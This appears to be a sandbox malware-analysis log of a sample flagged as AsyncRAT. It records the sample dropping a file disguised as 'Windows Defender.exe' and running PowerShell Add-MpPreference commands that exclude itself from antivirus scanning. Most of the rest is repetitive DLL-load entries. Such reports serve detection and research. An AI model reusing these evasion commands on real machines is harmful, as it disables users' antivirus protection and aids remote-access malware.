Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Code function: 15_2_00007FFB4AD112C9	15_2_00007FFB4AD112C9
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Code function: 15_2_00007FFB4AD11B39	15_2_00007FFB4AD11B39

Source: owuP726k3d.exe, 00000000.00000000.1470221129.00000000008DE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSolara.exe4 vs owuP726k3d.exe
Source: owuP726k3d.exe	Binary or memory string: OriginalFilenameSolara.exe4 vs owuP726k3d.exe

Source: owuP726k3d.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: owuP726k3d.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.owuP726k3d.exe.8d0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1470196010.00000000008D2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: owuP726k3d.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: owuP726k3d.exe, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: owuP726k3d.exe, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender.exe.0.dr, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: Windows Defender.exe.0.dr, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: Windows Defender.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Windows Defender.exe.0.dr, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: owuP726k3d.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: owuP726k3d.exe, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@15/21@3/3

Source: C:\Users\user\Desktop\owuP726k3d.exe

File created: C:\Users\user\AppData\Roaming\Windows Defender.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5976:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\owuP726k3d.exe	Mutant created: \Sessions\1\BaseNamedObjects\OSPDmToN2pBX1fa2
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6832:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6960:120:WilError_03

Source: C:\Users\user\Desktop\owuP726k3d.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: owuP726k3d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: owuP726k3d.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Users\user\Desktop\owuP726k3d.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\owuP726k3d.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: owuP726k3d.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\owuP726k3d.exe

File read: C:\Users\user\Desktop\owuP726k3d.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\owuP726k3d.exe "C:\Users\user\Desktop\owuP726k3d.exe"
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'owuP726k3d.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows Defender.exe "C:\Users\user\AppData\Roaming\Windows Defender.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Windows Defender.exe "C:\Users\user\AppData\Roaming\Windows Defender.exe"
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\owuP726k3d.exe'	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'owuP726k3d.exe'	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Windows Defender.exe'	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'	Jump to behavior

Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\owuP726k3d.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\Windows Defender.exe	Section loaded: apphelp.dll
